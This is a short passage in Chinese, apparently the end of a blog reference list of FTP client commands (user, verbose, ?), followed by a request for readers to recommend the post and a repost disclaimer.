　　71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。

　　72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.

　　73.?[cmd]：同help.

　　如果觉得这文章还算用心，请劳驾点击右下角的推荐，这是对我们这些做开源分享的最大的肯定，谢谢。

郑重声明：本文由网友发布，不代表盛行IT的观点，版权归原作者所有，仅为传播更多信息之目的，如有侵权请联系，我们将第一时间修改或删除，多谢。